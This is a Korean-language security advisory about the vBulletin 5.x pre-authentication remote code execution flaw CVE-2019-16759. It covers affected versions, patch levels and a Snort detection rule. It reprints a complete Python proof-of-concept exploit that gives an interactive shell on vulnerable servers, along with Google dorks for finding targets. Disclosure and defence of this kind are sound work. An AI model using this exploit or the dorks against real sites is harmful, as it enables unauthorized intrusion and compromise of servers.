[CVE 취약점] vBulletin 원격 코드 실행 취약점(CVE-2019-16759)

[CVE 취약점] vBulletin 원격 코드 실행 취약점(CVE-2019-16759)

참조

> https://seclists.org/fulldisclosure/2019/Sep/3

> https://github.com/M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit

> https://xz.aliyun.com/t/6419

> https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4

Poc 

#!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit #  # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # - site:*.vbulletin.net # - "Powered by vBulletin Version 5.5.4" import requests import sys if len(sys.argv) != 2:     sys.exit("Usage: %s " % sys.argv[0]) params = {"routestring":"ajax/render/widget_php"} while True:      try:           cmd = raw_input("vBulletin$ ")           params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"           r = requests.post(url = sys.argv[1], data = params)           if r.status_code == 200:                print r.text           else:                sys.exit("Exploit failed! :(")      except KeyboardInterrupt:           sys.exit("\nClosing shell...")      except Exception, e:           sys.exit(str(e))

개요

MH SUB I사의 홈페이지 구축 솔루션(CMS) vBulletin 에서 원격코드 실행 취약점이 발견

19년 9월 24일에 공격이 가능한 PoC 코드가 공개되었으며, 9월 25일 이후로 해당 취약점을 이용한 공격이 급증

 

해당 취약점은 공격자가 악성코드 감염 등 피해를 발생시킬 수 있으므로 해당 소프트웨어를 운영하는 관리자는 해결 방안에 따른 조치를 권고 함.

영향 받는 제품 버전

vBulletin

- 5.0.0 ~ 5.5.4

방안

보안 패치 적용(2019-09-25 Release)

- 5.5.4 Patch Level 1

- 5.5.3 Patch Level 1

- 5.5.2 Patch Level 1

Snort  

alert tcp any any -> any any (sid:1; gid:1; content:"routestring"; nocase; content:"widgetConfig"; nocase; flow:established,to_server; pcre:"/echo[\s|+]shell\_exec/smi"; msg:"vBulletin RCE_CVE-2019-16759";)